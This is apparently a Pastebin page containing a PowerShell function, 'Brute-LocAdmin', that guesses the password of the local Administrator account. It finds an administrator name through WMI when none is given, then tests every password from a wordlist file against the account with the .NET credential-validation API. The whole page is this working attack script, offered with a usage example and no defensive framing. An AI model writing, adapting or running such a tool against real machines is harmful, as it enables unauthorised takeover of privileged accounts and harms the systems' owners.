Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <#
- .Synopsis
- Brute-forces local Administrator account, if no name is provided it will attempt to find this by searching the local administrators group using WMI
- .DESCRIPTION
- Brute-forces local Administrator account, if no name is provided it will attempt to find this by searching the local administrators group using WMI
- .EXAMPLE
- PS C:\> Brute-LocAdmin -Username Adm-User
- #>
- Function Brute-LocAdmin
- {
- Add-Type -assemblyname System.DirectoryServices.AccountManagement
- Function Test-LocAdminCred
- {
- Param($username, $password)
- $computer = $env:COMPUTERNAME
- $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
- $object = New-Object PSObject | Select-Object Username, Password, IsValid
- $object.Username = $username;
- $object.Password = $password;
- $object.IsValid = $DS.ValidateCredentials($username, $password).ToString();
- return $object
- }
- if (!$username)
- {
- $username = 'Administrator'
- $admins = Get-WmiObject win32_groupuser
- $admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}
- $admins |% {
- if (!$_.partcomponent.contains("Win32_Group")) {
- $_.partcomponent -match ".+Domain\=(.+)\,Name\=(.+)$" > $nul
- Write-Host "Administrator not provided, found user: $username"
- $username = $matches[2].trim('"')
- }
- }
- }
- $allpasswords = Get-Content pass.txt
- $counter = 0
- foreach ($password in $allpasswords)
- {
- $counter++
- $result = Test-LocAdminCred $username $password
- $result
- if (($StopOnSuccess -eq 'True') -and ($result.IsValid -eq 'True')){
- $break = $true
- $result
- }
- if ($break -eq 'True'){break}
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement